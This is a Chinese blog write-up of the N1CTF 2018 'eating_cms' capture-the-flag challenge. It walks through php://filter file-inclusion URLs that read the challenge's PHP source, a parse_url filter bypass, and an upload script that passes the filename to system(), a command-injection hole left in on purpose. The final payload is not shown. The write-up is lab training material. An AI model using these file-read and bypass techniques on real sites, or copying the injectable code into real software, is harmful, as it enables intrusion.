[N1CTF 2018]eating_cms1

于 2024-09-08 18:34:16 发布
阅读量256 收藏 3
点赞数 2
分类专栏: CTF 文章标签: android php linux web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/142030378
版权

进入到页面是一个login登录页面 .

去访问他的register.php页面进入注册页面.

注册进入.

一眼文件包含.

去读取一下user.php

http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=user

 

解码.

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

看到它包含了一个function函数.

继续读取.

http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=function
<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

发现全是函数,而且其中的 filter_directory();被调用了,分析一下.

function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

是个parse_url漏洞利用,这段代码想让我们输入的url地址问好后过滤了"flag","manage","ffffllllaaaaggg",所以我们可以推测存在“flag","manage","ffffllllaaaaggg"

东西.

知识点:

parse_url() 函数是 PHP 中用于解析 URL 并返回其组成部分的函数。这个函数通常很安全,但如果不正确地使用或当输入的 URL 格式异常时,可能会引发一些潜在的问题或误解,但这并不直接等同于传统意义上的“漏洞”。

parse_url() 的基本用法

parse_url() 函数接受一个字符串(表示 URL),并返回一个关联数组,包含 URL 的各个组成部分(如 scheme、host、port、user、pass、path、query、fragment)。如果解析失败,则返回 FALSE。

潜在问题

  1. 错误的 URL 格式:如果输入的 URL 格式不正确,parse_url() 可能不会按预期工作。例如,如果 URL 缺少协议部分(如 http:// 或 https://),则 parse_url() 可能会将 URL 的第一部分解析为 path 而不是 host

  2. 编码问题:URL 中的特殊字符通常需要按照百分比编码(URL 编码)进行编码。如果未正确编码,parse_url() 可能无法正确解析这些部分,尤其是在路径(path)或查询字符串(query)中。

  3. 安全误解:有时,开发者可能错误地认为 parse_url() 可以用于验证或清理 URL。实际上,它仅仅是一个解析工具,并不提供安全验证或清理功能。因此,如果开发者没有进一步处理或验证 parse_url() 的输出,就可能会受到注入攻击等安全威胁。

所以我们可以利用格式错误,让其解析失败而输出false,从而绕过.

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

 

解码.

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

继续读取 .

//user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

访问一下.

文件上传不过是个假的,上传之后去跳到404页面.

 

不过看源码发现了一个php页面.

 

读取一下.

http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81//user.php?page=php://filter/convert.base64-encode/resource=upllloadddd
<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload fileï¼");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

是一个filename上传漏洞.

现在主要的目标就是找到真正的上传点.

对上面步骤进行回溯,找到了上传点.

http://2641f658-8af4-4626-92d0-ceb19180ea92.node5.buuoj.cn:81/user.php?page=m4aaannngggeee

开始注入.

 

游戏结束. 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

安红豆.
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[N1CTF 2018]eating_cms
snowlyzz的博客
09-15 373
cms审计
buuctf-web-[N1CTF 2018]eating_cms1
mlws1900的博客
03-11 535
试了一下弱口令,无效,再试一下万能密码,告诉我有waf,先不想再怎么绕过,直接开扫(信息收集)发现一个上传界面,随机上传一个文件,显示错误,看到upllloadddd,读它源码。可以看到这一行有一个system函数,我们可以对filename传参利用。upllloadddd.php(该界面访问报错,不是真正的上传界面)然而这个上传界面没啥用,上传上去的代码被base64编码,无法解析。发现此为命令执行后的结果,找寻flag,查看上级目录。到此为止,把能读的源码全读了,开始代码分析。一个cms,先打开环境。
[N1CTF 2018]eating_cms 不会编程的崽
不会编程的崽的博客
03-09 547
伪协议 绕过parse_url
BUUCTF--[N1CTF 2018]eating_cms
qq_46263951的博客
07-26 330
利用伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user <?php require_once("function.php"); if( !isset( $_SESSION['user'] )){ Header("Location: index.php"); } if($_SESSION['isadmin'] === '1'){ $oper_you_can_do = $OPERATE_adm.
[N1CTF 2018]eating_cms parse_url绕过
qq_62046696的博客
12-21 657
parse_url漏洞,有一个办法是使parse_url解析出错,从而无法进入下面的foreach判断。这道题考察的也不算是代码审计,更像是看你注意不注意细节,主要是一个个尝试的麻烦。伪协议访问会被过滤掉,直接到hacker的界面,然后我们就要想如何绕过,这句话是重点,用我们上传的文件名进行system,然后可以用管道符;为什么是这个而不是flag,是因为都试了以下,flag啥也不返回。那么问题又来了,这个既然是假的那真的上传界面在哪呢,文件上传的界面,随便上传了一个发现是一个假的界面。
BUUCTF:[N1CTF 2018]eating_cms
末初的CSDN博客
04-06 1855
试了一下register.php存在注册页面,注册一个账户登录 尝试利用伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user <?php require_once("function.php"); if( !isset( $_SESSION['user'] )){ Header("Locat...
[N1CTF 2018]eating_cms parse_url函数漏洞
qq_54929891的博客
05-14 531
进入就是一个登陆界面,随便输入一个账号密码抓包看看 发现有数据库语句,便试试万能密码 1'or'1'='1'# 发现被过滤了,一般这种题有个register.php和一个地方可以读取到源码的,我们要寻找试试 发现有注册界面,注册登陆一下 发现进入一个user.php页面,翻一下没有跟我们输入有关的回显,我们关注到有个page参数,不知道可不可以帮助我们读取到源码,直接伪协议试试 ?page=php://filter/read=convert.base64-encode/res..
[N1CTF 2018]eating_cms_
记录学习,一起进步
03-27 371
[N1CTF 2018]eating_cms_
N1CTF WEB WriteUp
heySister
03-13 4413
77777 作为一个小白,瑟瑟发抖地选择了这道被解出次数最多的题目….emmm…还是有一些收获的。 首先题目给出了一些代码和一些信息: 信息是关于安装配置虚拟机的…和我之前配置环境的步骤,指令差不多…感觉应该没什么问题,就只是告诉我们服务器上有这个东西。 给出的代码就比较关键了。而且题目About 里说可以修改points ,告诉我们flag 是admin's password...
BUU刷题记录——4
weixin_43610673的博客
08-31 1822
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它! 生日 间谍无处不在 :...
N1CTF 2018 lipstick WriteUp (bugku——多彩)
热门推荐
灬彬的博客
09-21 2万+
一开始是在bugku网站上看到这题的。。后来了解到是N1CTF2018国际赛的题。。   将图片下载下来之后放入Stegsolve。。。 看到了这个。。。(杨树林???)再加上题目是lipstick。。。心想着肯定与YSL的口红有关。。。 先分析下。。点击Analyse——&gt;Data Extract 看到有个PK头。。心里有数。。直接save bin 存为zip...
高德地图SDK Android版开发 10 InfoWindow
最新发布
程序喵D的博客
09-06 1875
前文介绍高德地图添加Marker覆盖物的使用方法,Marker结合InfoWindow可展示更详尽的信息。本文将介绍以下内容:1. 使用SDK默认样式显示InfoWindow的方法;2. 自定义InfoWindow样式的方法。
安卓model转鸿蒙ets
琼小资的专栏
09-03 407
现在的android studio提供了java自动转kotlin的实现,非常方便。那android的java和kotlin有没有可能转成鸿蒙artts呢。先从最简单的model转换开始,把kotlin的model转成ets。本质上都是字符串文件,讲道理应该是可行的。
RK3566/RK3568 Android 11 动态禁止/启用APP
qq_23921815的博客
09-04 369
RK3566/RK3568 Android 11 定制大全在系统服务中增加动态禁止/启用应用。
不小心删除了 Android 手机上的短信?3 步流程恢复误删除的短信以及图片、视频、联系人
Geeker55的博客
09-03 1727
不小心删除了 Android 手机上的短信?别担心,Android 版奇客数据恢复工具可以帮助您通过简单的 3 步流程恢复已删除的短信以及图片、视频、联系人等。如何在 Android 上恢复已删除的短信不小心删除了 Android 手机上的短信?Android 版奇客数据恢复只需 3 步即可帮助您恢复已删除的短信以及照片、视频、联系人等。最近,我发现很多安卓用户在互联网论坛上寻求帮助,以恢复他们已删除的短信。对于一些从未丢失过手机短信的人来说,很难想象一个人会如何删除他想保留的短信。
安装Android Studio及第一个Android工程可能遇到的问题,gradle下载过慢、sync失败?
学无止境,止于至善
09-04 993
Android Studio版本众多,电脑操作系统、电脑型号、电脑硬件也是多种多样,幸运的半个小时内可以完成安装,碰到不兼容的电脑,一天甚至更长时间都无法安装成功。Android安装及第一个Android工程分为4个步骤,为什么放到一起讲,因为只有Android的第一个工程运行到虚拟机上,Android的开发环境搭建才算完成。gradle下载失败、sync失败是最常见的两个问题,本文将介绍如何解决这些问题。
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。比赛的过程中,参赛选手需要使用各种技术和工具,对其他小队的系统进行攻击,尝试获取对方的旗帜。同时,参赛选手也需要保护自己的系统,防止其他小队进行攻击并窃取自己的旗帜。 ctf_awd_platform提供了一个仿真的网络环境,模拟了现实世界中的网络系统。参赛选手可以在这个环境中进行攻防实战,通过解决各种网络安全问题来提升自己的技能。 ctf_awd_platform不仅能够帮助参赛选手提升网络攻防技术,还能够提高其团队合作能力和解决问题的能力。在比赛中,参赛选手需要与队友紧密配合,共同制定攻击和防御策略,以获取最佳的比赛成绩。 总体而言,ctf_awd_platform是一个能够帮助参赛选手提升网络安全技术和团队合作能力的AWD平台,通过实战演练来提高参赛选手的技能水平,并为他们在网络安全领域的职业发展打下坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值